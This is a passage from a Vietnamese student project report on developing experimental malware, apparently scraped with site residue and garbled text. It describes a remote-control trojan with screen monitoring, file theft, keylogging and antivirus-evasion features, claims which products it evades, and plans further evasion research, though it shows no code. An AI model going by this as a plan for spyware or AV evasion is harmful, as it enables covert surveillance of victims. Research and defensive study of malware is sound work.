tồn hay khơng Hình 22: Ứng dụng điều khiển mã độc Trang 25 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Hình 23: Các cấu hình cho mã độc Một số chức giúp kẻ cơng theo dỏi người dùng ứng dụng điều khiển mã độc  Theo dõi hình mục tiêu Có thể theo dõi hình mục tiêu thay đổi hình mục tiêu  Theo dõi hệ thống tập tin mục tiêu Cỏ thể xem tổ chức thư mục số thông tin tập tin máy tính mục tiêu, đồng thời tải chúng Hình 24: Theo dõi hình mục tiêu Trang 26 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Hình 25: Theo dõi hệ thống tập tin mục tiêu Trang 27 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC CHƯƠNG KẾT LUẬN 5.1 Đánh giá đề tài 5.1.1 Những cơng việc làm - Tìm hiểu mã độc, chức tầm nguy hiểm cách thức vận hành mã độc - Viết chương trình mã độc theo dõi máy tính từ xa có chức như: o Monitor hình o Theo dõi chuột bàn phím o Các kỹ thuật qua mặt Antivirus 5.1.2 Những hạn chế đề tài Hiện phần mềm mã độc chưa thể qua mặt hai phần mềm Antivirus Malwarebytes Cynet Mặc dù phần mềm mã độc qua mặc hầu hết các phần mềm Antivirus lớn Kaspersky, McAfee, Microsoft Nhưng lúc triển khai thử nghiệm nhóm xử lý keylogger tải từ server không bị kiểm tra phần mềm Windows Defendere Microsoft, mà chưa xử lý phần mềm Antivirus khác cài đặt hệ thống người dùng Hạn chế cuối đề tài mã độc phải dựa vào phần mềm trung gian, phần mềm độc hại Active Windows để ẩn náo Phải yêu cầu quyền Administrator từ người dùng tránh né phát Windows Denfender 5.2 Hướng phát triển đề tài Nghiên cứu sâu giải thuật vượt mặt Antivirus việc giải hạn chế đề tài đề cập Nghiên cứu sâu môi trường công Trang 28 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Tài liệu tham khảo Matthew Munns, TROJAN, Kindle Edition, 2017 Hassan Salmani, Trusted Digital Circuits Hardware Trojan Vulnerabilities, Prevention and Detection Springer (2018) Shamim Miah, Muslims, Schooling and Security_ Trojan Horse, Prevent and Racial Politics-Palgrave Macmillan (2017) Swarup Bhunia, Mark M Tehranipoor (eds.), The Hardware Trojan War_ Attacks, Myths, and Defenses-Springer International Publishing (2018) Virustotal [Online] // Virustotal - 11, 2021 - https://www.snort.org/ Trang 29 ... khiển mã độc Cấu hình cho mã độc hoạt động theo dõi hoạt động mã độc Giám sát mã độc tồn hay khơng Hình 22: Ứng dụng điều khiển mã độc Trang 25 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ... Trang 26 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Hình 25: Theo dõi hệ thống tập tin mục tiêu Trang 27 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC CHƯƠNG KẾT LUẬN 5.1... Win32/Reveton.T Trang BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC CHƯƠNG CƠ CHẾ HOẠT ĐỘNG CỦA MÃ ĐỘC 2.1 Cơ chế hoạt động mã độc Nghiên cứu mã độc máy tính ln gắn với việc phân tích

Ngày đăng: 22/12/2021, 21:16

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w